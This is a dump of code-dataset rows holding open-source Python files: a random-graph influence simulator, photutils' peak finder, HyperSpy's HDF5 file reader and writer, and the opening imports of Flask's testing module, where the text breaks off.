repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
yuikns/pattern-counter | data/dataset/ER_middle/generate_graph.py | 1 | 1801 | import random as ran
import networkx as nx
import Queue
import matplotlib.pyplot as plt
n=150 # number of nodes
p=0.1 # edge selection probability
G=nx.erdos_renyi_graph(n,p)
print "#nodes = ", G.number_of_nodes()
print "#edges = ", G.number_of_edges()
L=1000 # number of logs
influence_probability = 0.35 # activity probability
seed_id = ran.randint(0,n-1)
q = Queue.Queue()
l = 0
q.put((seed_id,0))
G.node[seed_id]['label'] = '0'
logs = []
logs.append((seed_id, 0))
while(not q.empty() and l < L):
l+=1
(node_id, t) = q.get()
neighbors = G.neighbors(node_id)
if len(neighbors) == 0:
node_id = ran.randint(0,n-1)
if G.node[node_id].get('label') != None:
G.node[node_id]['label'] = G.node[node_id].get('label')+"-"+str(t+1)
else:
G.node[node_id]['label'] = str(t+1)
q.put((node_id, t+1))
logs.append((node_id, t+1))
print len(logs)
else:
for neighbor_id in neighbors:
x = ran.random()
if x <= influence_probability:
if G.node[neighbor_id].get('label') != None:
G.node[neighbor_id]['label'] = G.node[neighbor_id].get('label')+"-"+str(t+1)
else:
G.node[neighbor_id]['label'] = str(t+1)
q.put((neighbor_id, t+1))
logs.append((neighbor_id, t+1))
for i in range(G.number_of_nodes()):
print i, " ", G.node[i].get('label')
f = open("graph.txt","w")
f.write(str(G.number_of_nodes())+"\t"+str(G.number_of_edges())+"\n")
for edge in G.edges():
f.write(str(edge[0])+"\t"+str(edge[1])+"\t1.0\n")
f.close()
f = open("node_dict.txt", "w")
for node in range(n):
f.write(str(node)+"\t"+str(node)+"\n")
f.close()
print "#logs = ", len(logs)
f = open("logs.txt", "w")
for log in logs:
f.write(str(log[0])+"\t"+str(log[1])+"\n")
f.close()
nx.draw(G, with_labels=True)
# nx.draw_networkx_labels(G,pos=nx.spring_layout(G))
plt.show()
| mit | -1,865,508,281,380,050,700 | 25.101449 | 82 | 0.609661 | false |
astropy/photutils | photutils/detection/peakfinder.py | 1 | 7745 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides tools for finding local peaks in an astronomical
image.
"""
import warnings
from astropy.table import Table
import numpy as np
from ..utils.exceptions import NoDetectionsWarning
__all__ = ['find_peaks']
def find_peaks(data, threshold, box_size=3, footprint=None, mask=None,
border_width=None, npeaks=np.inf, centroid_func=None,
error=None, wcs=None):
"""
Find local peaks in an image that are above above a specified
threshold value.
Peaks are the maxima above the ``threshold`` within a local region.
The local regions are defined by either the ``box_size`` or
``footprint`` parameters. ``box_size`` defines the local region
around each pixel as a square box. ``footprint`` is a boolean array
where `True` values specify the region shape.
If multiple pixels within a local region have identical intensities,
then the coordinates of all such pixels are returned. Otherwise,
there will be only one peak pixel per local region. Thus, the
defined region effectively imposes a minimum separation between
peaks unless there are identical peaks within the region.
If ``centroid_func`` is input, then it will be used to calculate a
centroid within the defined local region centered on each detected
peak pixel. In this case, the centroid will also be returned in the
output table.
Parameters
----------
data : array_like
The 2D array of the image.
threshold : float or array-like
The data value or pixel-wise data values to be used for the
detection threshold. A 2D ``threshold`` must have the same shape
as ``data``. See `~photutils.segmentation.detect_threshold` for
one way to create a ``threshold`` image.
box_size : scalar or tuple, optional
The size of the local region to search for peaks at every point
in ``data``. If ``box_size`` is a scalar, then the region shape
will be ``(box_size, box_size)``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
footprint : `~numpy.ndarray` of bools, optional
A boolean array where `True` values describe the local footprint
region within which to search for peaks at every point in
``data``. ``box_size=(n, m)`` is equivalent to
``footprint=np.ones((n, m))``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
mask : array_like, bool, optional
A boolean mask with the same shape as ``data``, where a `True`
value indicates the corresponding element of ``data`` is masked.
border_width : bool, optional
The width in pixels to exclude around the border of the
``data``.
npeaks : int, optional
The maximum number of peaks to return. When the number of
detected peaks exceeds ``npeaks``, the peaks with the highest
peak intensities will be returned.
centroid_func : callable, optional
A callable object (e.g., function or class) that is used to
calculate the centroid of a 2D array. The ``centroid_func``
must accept a 2D `~numpy.ndarray`, have a ``mask`` keyword, and
optionally an ``error`` keyword. The callable object must return
a tuple of two 1D `~numpy.ndarray`\\s, representing the x and y
centroids, respectively.
error : array_like, optional
The 2D array of the 1-sigma errors of the input ``data``.
``error`` is used only if ``centroid_func`` is input (the
``error`` array is passed directly to the ``centroid_func``).
wcs : `None` or WCS object, optional
A world coordinate system (WCS) transformation that
supports the `astropy shared interface for WCS
<https://docs.astropy.org/en/stable/wcs/wcsapi.html>`_
(e.g., `astropy.wcs.WCS`, `gwcs.wcs.WCS`). If `None`, then
the sky coordinates will not be returned in the output
`~astropy.table.Table`.
Returns
-------
output : `~astropy.table.Table` or `None`
A table containing the x and y pixel location of the peaks and
their values. If ``centroid_func`` is input, then the table
will also contain the centroid position. If no peaks are found
then `None` is returned.
"""
from scipy.ndimage import maximum_filter
data = np.asanyarray(data)
if np.all(data == data.flat[0]):
warnings.warn('Input data is constant. No local peaks can be found.',
NoDetectionsWarning)
return None
if not np.isscalar(threshold):
threshold = np.asanyarray(threshold)
if data.shape != threshold.shape:
raise ValueError('A threshold array must have the same shape as '
'the input data.')
# remove NaN values to avoid runtime warnings
nan_mask = np.isnan(data)
if np.any(nan_mask):
data = np.copy(data) # ndarray
data[nan_mask] = np.nanmin(data)
if footprint is not None:
data_max = maximum_filter(data, footprint=footprint, mode='constant',
cval=0.0)
else:
data_max = maximum_filter(data, size=box_size, mode='constant',
cval=0.0)
peak_goodmask = (data == data_max) # good pixels are True
if mask is not None:
mask = np.asanyarray(mask)
if data.shape != mask.shape:
raise ValueError('data and mask must have the same shape')
peak_goodmask = np.logical_and(peak_goodmask, ~mask)
if border_width is not None:
for i in range(peak_goodmask.ndim):
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask[:border_width] = False
peak_goodmask[-border_width:] = False
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask = np.logical_and(peak_goodmask, (data > threshold))
y_peaks, x_peaks = peak_goodmask.nonzero()
peak_values = data[y_peaks, x_peaks]
nxpeaks = len(x_peaks)
if nxpeaks > npeaks:
idx = np.argsort(peak_values)[::-1][:npeaks]
x_peaks = x_peaks[idx]
y_peaks = y_peaks[idx]
peak_values = peak_values[idx]
if nxpeaks == 0:
warnings.warn('No local peaks were found.', NoDetectionsWarning)
return None
# construct the output Table
colnames = ['x_peak', 'y_peak', 'peak_value']
coldata = [x_peaks, y_peaks, peak_values]
table = Table(coldata, names=colnames)
if wcs is not None:
skycoord_peaks = wcs.pixel_to_world(x_peaks, y_peaks)
table.add_column(skycoord_peaks, name='skycoord_peak', index=2)
# perform centroiding
if centroid_func is not None:
from ..centroids import centroid_sources # prevents circular import
if not callable(centroid_func):
raise TypeError('centroid_func must be a callable object')
x_centroids, y_centroids = centroid_sources(
data, x_peaks, y_peaks, box_size=box_size,
footprint=footprint, error=error, mask=mask,
centroid_func=centroid_func)
table['x_centroid'] = x_centroids
table['y_centroid'] = y_centroids
if wcs is not None:
skycoord_centroids = wcs.pixel_to_world(x_centroids, y_centroids)
idx = table.colnames.index('y_centroid') + 1
table.add_column(skycoord_centroids, name='skycoord_centroid',
index=idx)
return table
| bsd-3-clause | 3,252,517,488,236,389,400 | 38.116162 | 77 | 0.634732 | false |
ericpre/hyperspy | hyperspy/io_plugins/hspy.py | 1 | 31796 | # -*- coding: utf-8 -*-
# Copyright 2007-2021 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from distutils.version import LooseVersion
import warnings
import logging
import datetime
import ast
import h5py
import numpy as np
import dask.array as da
from traits.api import Undefined
from hyperspy.misc.utils import ensure_unicode, multiply, get_object_package_info
from hyperspy.axes import AxesManager
_logger = logging.getLogger(__name__)
# Plugin characteristics
# ----------------------
format_name = 'HSPY'
description = \
'The default file format for HyperSpy based on the HDF5 standard'
full_support = False
# Recognised file extension
file_extensions = ['hspy', 'hdf5']
default_extension = 0
# Writing capabilities
writes = True
version = "3.1"
# -----------------------
# File format description
# -----------------------
# The root must contain a group called Experiments
# The experiments group can contain any number of subgroups
# Each subgroup is an experiment or signal
# Each subgroup must contain at least one dataset called data
# The data is an array of arbitrary dimension
# In addition a number equal to the number of dimensions of the data
# dataset + 1 of empty groups called coordinates followed by a number
# must exists with the following attributes:
# 'name'
# 'offset'
# 'scale'
# 'units'
# 'size'
# 'index_in_array'
# The experiment group contains a number of attributes that will be
# directly assigned as class attributes of the Signal instance. In
# addition the experiment groups may contain 'original_metadata' and
# 'metadata'subgroup that will be
# assigned to the same name attributes of the Signal instance as a
# Dictionary Browsers
# The Experiments group can contain attributes that may be common to all
# the experiments and that will be accessible as attributes of the
# Experiments instance
#
# CHANGES
#
# v3.1
# - move metadata.Signal.binned attribute to axes.is_binned parameter
#
# v3.0
# - add Camera and Stage node
# - move tilt_stage to Stage.tilt_alpha
#
# v2.2
# - store more metadata as string: date, time, notes, authors and doi
# - store quantity for intensity axis
#
# v2.1
# - Store the navigate attribute.
# - record_by is stored only for backward compatibility but the axes navigate
# attribute takes precendence over record_by for files with version >= 2.1
# v1.3
# ----
# - Added support for lists, tuples and binary strings
not_valid_format = 'The file is not a valid HyperSpy hdf5 file'
current_file_version = None # Format version of the file being read
default_version = LooseVersion(version)
def get_hspy_format_version(f):
if "file_format_version" in f.attrs:
version = f.attrs["file_format_version"]
if isinstance(version, bytes):
version = version.decode()
if isinstance(version, float):
version = str(round(version, 2))
elif "Experiments" in f:
# Chances are that this is a HSpy hdf5 file version 1.0
version = "1.0"
elif "Analysis" in f:
# Starting version 2.0 we have "Analysis" field as well
version = "2.0"
else:
raise IOError(not_valid_format)
return LooseVersion(version)
def file_reader(filename, backing_store=False,
lazy=False, **kwds):
"""Read data from hdf5 files saved with the hyperspy hdf5 format specification
Parameters
----------
filename: str
lazy: bool
Load image lazily using dask
**kwds, optional
"""
try:
# in case blosc compression is used
import hdf5plugin
except ImportError:
pass
mode = kwds.pop('mode', 'r')
f = h5py.File(filename, mode=mode, **kwds)
# Getting the format version here also checks if it is a valid HSpy
# hdf5 file, so the following two lines must not be deleted or moved
# elsewhere.
global current_file_version
current_file_version = get_hspy_format_version(f)
global default_version
if current_file_version > default_version:
warnings.warn(
"This file was written using a newer version of the "
"HyperSpy hdf5 file format. I will attempt to load it, but, "
"if I fail, it is likely that I will be more successful at "
"this and other tasks if you upgrade me.")
models_with_signals = []
standalone_models = []
if 'Analysis/models' in f:
try:
m_gr = f.require_group('Analysis/models')
for model_name in m_gr:
if '_signal' in m_gr[model_name].attrs:
key = m_gr[model_name].attrs['_signal']
# del m_gr[model_name].attrs['_signal']
res = hdfgroup2dict(
m_gr[model_name],
lazy=lazy)
del res['_signal']
models_with_signals.append((key, {model_name: res}))
else:
standalone_models.append(
{model_name: hdfgroup2dict(
m_gr[model_name], lazy=lazy)})
except TypeError:
raise IOError(not_valid_format)
experiments = []
exp_dict_list = []
if 'Experiments' in f:
for ds in f['Experiments']:
if isinstance(f['Experiments'][ds], h5py.Group):
if 'data' in f['Experiments'][ds]:
experiments.append(ds)
# Parse the file
for experiment in experiments:
exg = f['Experiments'][experiment]
exp = hdfgroup2signaldict(exg, lazy)
# assign correct models, if found:
_tmp = {}
for (key, _dict) in reversed(models_with_signals):
if key == exg.name:
_tmp.update(_dict)
models_with_signals.remove((key, _dict))
exp['models'] = _tmp
exp_dict_list.append(exp)
for _, m in models_with_signals:
standalone_models.append(m)
exp_dict_list.extend(standalone_models)
if not len(exp_dict_list):
raise IOError('This is not a valid HyperSpy HDF5 file. '
'You can still load the data using a hdf5 reader, '
'e.g. h5py, and manually create a Signal. '
'Please, refer to the User Guide for details')
if not lazy:
f.close()
return exp_dict_list
def hdfgroup2signaldict(group, lazy=False):
global current_file_version
global default_version
if current_file_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
exp = {'metadata': hdfgroup2dict(
group[metadata], lazy=lazy),
'original_metadata': hdfgroup2dict(
group[original_metadata], lazy=lazy),
'attributes': {}
}
if "package" in group.attrs:
# HyperSpy version is >= 1.5
exp["package"] = group.attrs["package"]
exp["package_version"] = group.attrs["package_version"]
else:
# Prior to v1.4 we didn't store the package information. Since there
# were already external package we cannot assume any package provider so
# we leave this empty.
exp["package"] = ""
exp["package_version"] = ""
data = group['data']
if lazy:
data = da.from_array(data, chunks=data.chunks)
exp['attributes']['_lazy'] = True
else:
data = np.asanyarray(data)
exp['data'] = data
axes = []
for i in range(len(exp['data'].shape)):
try:
axes.append(dict(group['axis-%i' % i].attrs))
axis = axes[-1]
for key, item in axis.items():
if isinstance(item, np.bool_):
axis[key] = bool(item)
else:
axis[key] = ensure_unicode(item)
except KeyError:
break
if len(axes) != len(exp['data'].shape): # broke from the previous loop
try:
axes = [i for k, i in sorted(iter(hdfgroup2dict(
group['_list_' + str(len(exp['data'].shape)) + '_axes'],
lazy=lazy).items()))]
except KeyError:
raise IOError(not_valid_format)
exp['axes'] = axes
if 'learning_results' in group.keys():
exp['attributes']['learning_results'] = \
hdfgroup2dict(
group['learning_results'],
lazy=lazy)
if 'peak_learning_results' in group.keys():
exp['attributes']['peak_learning_results'] = \
hdfgroup2dict(
group['peak_learning_results'],
lazy=lazy)
# If the title was not defined on writing the Experiment is
# then called __unnamed__. The next "if" simply sets the title
# back to the empty string
if "General" in exp["metadata"] and "title" in exp["metadata"]["General"]:
if '__unnamed__' == exp['metadata']['General']['title']:
exp['metadata']["General"]['title'] = ''
if current_file_version < LooseVersion("1.1"):
# Load the decomposition results written with the old name,
# mva_results
if 'mva_results' in group.keys():
exp['attributes']['learning_results'] = hdfgroup2dict(
group['mva_results'], lazy=lazy)
if 'peak_mva_results' in group.keys():
exp['attributes']['peak_learning_results'] = hdfgroup2dict(
group['peak_mva_results'], lazy=lazy)
# Replace the old signal and name keys with their current names
if 'signal' in exp['metadata']:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp['metadata']["Signal"]['signal_type'] = \
exp['metadata']['signal']
del exp['metadata']['signal']
if 'name' in exp['metadata']:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp['metadata']['General']['title'] = \
exp['metadata']['name']
del exp['metadata']['name']
if current_file_version < LooseVersion("1.2"):
if '_internal_parameters' in exp['metadata']:
exp['metadata']['_HyperSpy'] = \
exp['metadata']['_internal_parameters']
del exp['metadata']['_internal_parameters']
if 'stacking_history' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Stacking_history"] = \
exp['metadata']['_HyperSpy']['stacking_history']
del exp['metadata']['_HyperSpy']["stacking_history"]
if 'folding' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Folding"] = \
exp['metadata']['_HyperSpy']['folding']
del exp['metadata']['_HyperSpy']["folding"]
if 'Variance_estimation' in exp['metadata']:
if "Noise_properties" not in exp["metadata"]:
exp["metadata"]["Noise_properties"] = {}
exp['metadata']['Noise_properties']["Variance_linear_model"] = \
exp['metadata']['Variance_estimation']
del exp['metadata']['Variance_estimation']
if "TEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["TEM"] = \
exp["metadata"]["TEM"]
del exp["metadata"]["TEM"]
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
if "EELS" in tem:
if "dwell_time" in tem:
tem["EELS"]["dwell_time"] = tem["dwell_time"]
del tem["dwell_time"]
if "dwell_time_units" in tem:
tem["EELS"]["dwell_time_units"] = tem["dwell_time_units"]
del tem["dwell_time_units"]
if "exposure" in tem:
tem["EELS"]["exposure"] = tem["exposure"]
del tem["exposure"]
if "exposure_units" in tem:
tem["EELS"]["exposure_units"] = tem["exposure_units"]
del tem["exposure_units"]
if "Detector" not in tem:
tem["Detector"] = {}
tem["Detector"] = tem["EELS"]
del tem["EELS"]
if "EDS" in tem:
if "Detector" not in tem:
tem["Detector"] = {}
if "EDS" not in tem["Detector"]:
tem["Detector"]["EDS"] = {}
tem["Detector"]["EDS"] = tem["EDS"]
del tem["EDS"]
del tem
if "SEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["SEM"] = \
exp["metadata"]["SEM"]
del exp["metadata"]["SEM"]
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "EDS" in sem:
if "Detector" not in sem:
sem["Detector"] = {}
if "EDS" not in sem["Detector"]:
sem["Detector"]["EDS"] = {}
sem["Detector"]["EDS"] = sem["EDS"]
del sem["EDS"]
del sem
if "Sample" in exp["metadata"] and "Xray_lines" in exp[
"metadata"]["Sample"]:
exp["metadata"]["Sample"]["xray_lines"] = exp[
"metadata"]["Sample"]["Xray_lines"]
del exp["metadata"]["Sample"]["Xray_lines"]
for key in ["title", "date", "time", "original_filename"]:
if key in exp["metadata"]:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp["metadata"]["General"][key] = exp["metadata"][key]
del exp["metadata"][key]
for key in ["record_by", "signal_origin", "signal_type"]:
if key in exp["metadata"]:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp["metadata"]["Signal"][key] = exp["metadata"][key]
del exp["metadata"][key]
if current_file_version < LooseVersion("3.0"):
if "Acquisition_instrument" in exp["metadata"]:
# Move tilt_stage to Stage.tilt_alpha
# Move exposure time to Detector.Camera.exposure_time
if "TEM" in exp["metadata"]["Acquisition_instrument"]:
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
exposure = None
if "tilt_stage" in tem:
tem["Stage"] = {"tilt_alpha": tem["tilt_stage"]}
del tem["tilt_stage"]
if "exposure" in tem:
exposure = "exposure"
# Digital_micrograph plugin was parsing to 'exposure_time'
# instead of 'exposure': need this to be compatible with
# previous behaviour
if "exposure_time" in tem:
exposure = "exposure_time"
if exposure is not None:
if "Detector" not in tem:
tem["Detector"] = {"Camera": {
"exposure": tem[exposure]}}
tem["Detector"]["Camera"] = {"exposure": tem[exposure]}
del tem[exposure]
# Move tilt_stage to Stage.tilt_alpha
if "SEM" in exp["metadata"]["Acquisition_instrument"]:
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "tilt_stage" in sem:
sem["Stage"] = {"tilt_alpha": sem["tilt_stage"]}
del sem["tilt_stage"]
return exp
def dict2hdfgroup(dictionary, group, **kwds):
"Recursive writer of dicts and signals"
from hyperspy.misc.utils import DictionaryTreeBrowser
from hyperspy.signal import BaseSignal
def parse_structure(key, group, value, _type, **kwds):
try:
# Here we check if there are any signals in the container, as
# casting a long list of signals to a numpy array takes a very long
# time. So we check if there are any, and save numpy the trouble
if np.any([isinstance(t, BaseSignal) for t in value]):
tmp = np.array([[0]])
else:
tmp = np.array(value)
except ValueError:
tmp = np.array([[0]])
if tmp.dtype == np.dtype('O') or tmp.ndim != 1:
dict2hdfgroup(dict(zip(
[str(i) for i in range(len(value))], value)),
group.create_group(_type + str(len(value)) + '_' + key),
**kwds)
elif tmp.dtype.type is np.unicode_:
if _type + key in group:
del group[_type + key]
group.create_dataset(_type + key,
tmp.shape,
dtype=h5py.special_dtype(vlen=str),
**kwds)
group[_type + key][:] = tmp[:]
else:
if _type + key in group:
del group[_type + key]
group.create_dataset(
_type + key,
data=tmp,
**kwds)
for key, value in dictionary.items():
if isinstance(value, dict):
dict2hdfgroup(value, group.create_group(key),
**kwds)
elif isinstance(value, DictionaryTreeBrowser):
dict2hdfgroup(value.as_dictionary(),
group.create_group(key),
**kwds)
elif isinstance(value, BaseSignal):
kn = key if key.startswith('_sig_') else '_sig_' + key
write_signal(value, group.require_group(kn))
elif isinstance(value, (np.ndarray, h5py.Dataset, da.Array)):
overwrite_dataset(group, value, key, **kwds)
elif value is None:
group.attrs[key] = '_None_'
elif isinstance(value, bytes):
try:
# binary string if has any null characters (otherwise not
# supported by hdf5)
value.index(b'\x00')
group.attrs['_bs_' + key] = np.void(value)
except ValueError:
group.attrs[key] = value.decode()
elif isinstance(value, str):
group.attrs[key] = value
elif isinstance(value, AxesManager):
dict2hdfgroup(value.as_dictionary(),
group.create_group('_hspy_AxesManager_' + key),
**kwds)
elif isinstance(value, list):
if len(value):
parse_structure(key, group, value, '_list_', **kwds)
else:
group.attrs['_list_empty_' + key] = '_None_'
elif isinstance(value, tuple):
if len(value):
parse_structure(key, group, value, '_tuple_', **kwds)
else:
group.attrs['_tuple_empty_' + key] = '_None_'
elif value is Undefined:
continue
else:
try:
group.attrs[key] = value
except BaseException:
_logger.exception(
"The hdf5 writer could not write the following "
"information in the file: %s : %s", key, value)
def get_signal_chunks(shape, dtype, signal_axes=None):
"""Function that calculates chunks for the signal, preferably at least one
chunk per signal space.
Parameters
----------
shape : tuple
the shape of the dataset to be sored / chunked
dtype : {dtype, string}
the numpy dtype of the data
signal_axes: {None, iterable of ints}
the axes defining "signal space" of the dataset. If None, the default
h5py chunking is performed.
"""
typesize = np.dtype(dtype).itemsize
if signal_axes is None:
return h5py._hl.filters.guess_chunk(shape, None, typesize)
# largely based on the guess_chunk in h5py
CHUNK_MAX = 1024 * 1024
want_to_keep = multiply([shape[i] for i in signal_axes]) * typesize
if want_to_keep >= CHUNK_MAX:
chunks = [1 for _ in shape]
for i in signal_axes:
chunks[i] = shape[i]
return tuple(chunks)
chunks = [i for i in shape]
idx = 0
navigation_axes = tuple(i for i in range(len(shape)) if i not in
signal_axes)
nchange = len(navigation_axes)
while True:
chunk_bytes = multiply(chunks) * typesize
if chunk_bytes < CHUNK_MAX:
break
if multiply([chunks[i] for i in navigation_axes]) == 1:
break
change = navigation_axes[idx % nchange]
chunks[change] = np.ceil(chunks[change] / 2.0)
idx += 1
return tuple(int(x) for x in chunks)
def overwrite_dataset(group, data, key, signal_axes=None, chunks=None, **kwds):
if chunks is None:
if isinstance(data, da.Array):
# For lazy dataset, by default, we use the current dask chunking
chunks = tuple([c[0] for c in data.chunks])
else:
# If signal_axes=None, use automatic h5py chunking, otherwise
# optimise the chunking to contain at least one signal per chunk
chunks = get_signal_chunks(data.shape, data.dtype, signal_axes)
if np.issubdtype(data.dtype, np.dtype('U')):
# Saving numpy unicode type is not supported in h5py
data = data.astype(np.dtype('S'))
if data.dtype == np.dtype('O'):
# For saving ragged array
# http://docs.h5py.org/en/stable/special.html#arbitrary-vlen-data
group.require_dataset(key,
chunks,
dtype=h5py.special_dtype(vlen=data[0].dtype),
**kwds)
group[key][:] = data[:]
maxshape = tuple(None for _ in data.shape)
got_data = False
while not got_data:
try:
these_kwds = kwds.copy()
these_kwds.update(dict(shape=data.shape,
dtype=data.dtype,
exact=True,
maxshape=maxshape,
chunks=chunks,
shuffle=True,))
# If chunks is True, the `chunks` attribute of `dset` below
# contains the chunk shape guessed by h5py
dset = group.require_dataset(key, **these_kwds)
got_data = True
except TypeError:
# if the shape or dtype/etc do not match,
# we delete the old one and create new in the next loop run
del group[key]
if dset == data:
# just a reference to already created thing
pass
else:
_logger.info(f"Chunks used for saving: {dset.chunks}")
if isinstance(data, da.Array):
if data.chunks != dset.chunks:
data = data.rechunk(dset.chunks)
da.store(data, dset)
elif data.flags.c_contiguous:
dset.write_direct(data)
else:
dset[:] = data
def hdfgroup2dict(group, dictionary=None, lazy=False):
if dictionary is None:
dictionary = {}
for key, value in group.attrs.items():
if isinstance(value, bytes):
value = value.decode()
if isinstance(value, (np.string_, str)):
if value == '_None_':
value = None
elif isinstance(value, np.bool_):
value = bool(value)
elif isinstance(value, np.ndarray) and value.dtype.char == "S":
# Convert strings to unicode
value = value.astype("U")
if value.dtype.str.endswith("U1"):
value = value.tolist()
# skip signals - these are handled below.
if key.startswith('_sig_'):
pass
elif key.startswith('_list_empty_'):
dictionary[key[len('_list_empty_'):]] = []
elif key.startswith('_tuple_empty_'):
dictionary[key[len('_tuple_empty_'):]] = ()
elif key.startswith('_bs_'):
dictionary[key[len('_bs_'):]] = value.tobytes()
# The following two elif stataments enable reading date and time from
# v < 2 of HyperSpy's metadata specifications
elif key.startswith('_datetime_date'):
date_iso = datetime.date(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
elif key.startswith('_datetime_time'):
date_iso = datetime.time(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
else:
dictionary[key] = value
if not isinstance(group, h5py.Dataset):
for key in group.keys():
if key.startswith('_sig_'):
from hyperspy.io import dict2signal
dictionary[key[len('_sig_'):]] = (
dict2signal(hdfgroup2signaldict(
group[key], lazy=lazy)))
elif isinstance(group[key], h5py.Dataset):
dat = group[key]
kn = key
if key.startswith("_list_"):
if (h5py.check_string_dtype(dat.dtype) and
hasattr(dat, 'asstr')):
# h5py 3.0 and newer
# https://docs.h5py.org/en/3.0.0/strings.html
dat = dat.asstr()[:]
ans = np.array(dat)
ans = ans.tolist()
kn = key[6:]
elif key.startswith("_tuple_"):
ans = np.array(dat)
ans = tuple(ans.tolist())
kn = key[7:]
elif dat.dtype.char == "S":
ans = np.array(dat)
try:
ans = ans.astype("U")
except UnicodeDecodeError:
# There are some strings that must stay in binary,
# for example dill pickles. This will obviously also
# let "wrong" binary string fail somewhere else...
pass
elif lazy:
ans = da.from_array(dat, chunks=dat.chunks)
else:
ans = np.array(dat)
dictionary[kn] = ans
elif key.startswith('_hspy_AxesManager_'):
dictionary[key[len('_hspy_AxesManager_'):]] = AxesManager(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
elif key.startswith('_list_'):
dictionary[key[7 + key[6:].find('_'):]] = \
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))]
elif key.startswith('_tuple_'):
dictionary[key[8 + key[7:].find('_'):]] = tuple(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
else:
dictionary[key] = {}
hdfgroup2dict(
group[key],
dictionary[key],
lazy=lazy)
return dictionary
def write_signal(signal, group, **kwds):
"Writes a hyperspy signal to a hdf5 group"
group.attrs.update(get_object_package_info(signal))
if default_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
if 'compression' not in kwds:
kwds['compression'] = 'gzip'
for axis in signal.axes_manager._axes:
axis_dict = axis.get_axis_dictionary()
coord_group = group.create_group(
'axis-%s' % axis.index_in_array)
dict2hdfgroup(axis_dict, coord_group, **kwds)
mapped_par = group.create_group(metadata)
metadata_dict = signal.metadata.as_dictionary()
overwrite_dataset(group, signal.data, 'data',
signal_axes=signal.axes_manager.signal_indices_in_array,
**kwds)
if default_version < LooseVersion("1.2"):
metadata_dict["_internal_parameters"] = \
metadata_dict.pop("_HyperSpy")
# Remove chunks from the kwds since it wouldn't have the same rank as the
# dataset and can't be used
kwds.pop('chunks', None)
dict2hdfgroup(metadata_dict, mapped_par, **kwds)
original_par = group.create_group(original_metadata)
dict2hdfgroup(signal.original_metadata.as_dictionary(), original_par,
**kwds)
learning_results = group.create_group('learning_results')
dict2hdfgroup(signal.learning_results.__dict__,
learning_results, **kwds)
if hasattr(signal, 'peak_learning_results'):
peak_learning_results = group.create_group(
'peak_learning_results')
dict2hdfgroup(signal.peak_learning_results.__dict__,
peak_learning_results, **kwds)
if len(signal.models):
model_group = group.file.require_group('Analysis/models')
dict2hdfgroup(signal.models._models.as_dictionary(),
model_group, **kwds)
for model in model_group.values():
model.attrs['_signal'] = group.name
def file_writer(filename, signal, *args, **kwds):
"""Writes data to hyperspy's hdf5 format
Parameters
----------
filename: str
signal: a BaseSignal instance
*args, optional
**kwds, optional
"""
with h5py.File(filename, mode='w') as f:
f.attrs['file_format'] = "HyperSpy"
f.attrs['file_format_version'] = version
exps = f.create_group('Experiments')
group_name = signal.metadata.General.title if \
signal.metadata.General.title else '__unnamed__'
# / is a invalid character, see #942
if "/" in group_name:
group_name = group_name.replace("/", "-")
expg = exps.create_group(group_name)
# Add record_by metadata for backward compatibility
smd = signal.metadata.Signal
if signal.axes_manager.signal_dimension == 1:
smd.record_by = "spectrum"
elif signal.axes_manager.signal_dimension == 2:
smd.record_by = "image"
else:
smd.record_by = ""
try:
write_signal(signal, expg, **kwds)
except BaseException:
raise
finally:
del smd.record_by
| gpl-3.0 | -2,065,360,871,214,329,600 | 38.645885 | 82 | 0.541169 | false |
tristanfisher/flask | flask/testing.py | 1 | 6608 | # -*- coding: utf-8 -*-
"""
flask.testing
~~~~~~~~~~~~~
Implements test support helpers. This module is lazily imported
and usually not used in production environments.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import werkzeug
from contextlib import contextmanager
from werkzeug.test import Client, EnvironBuilder
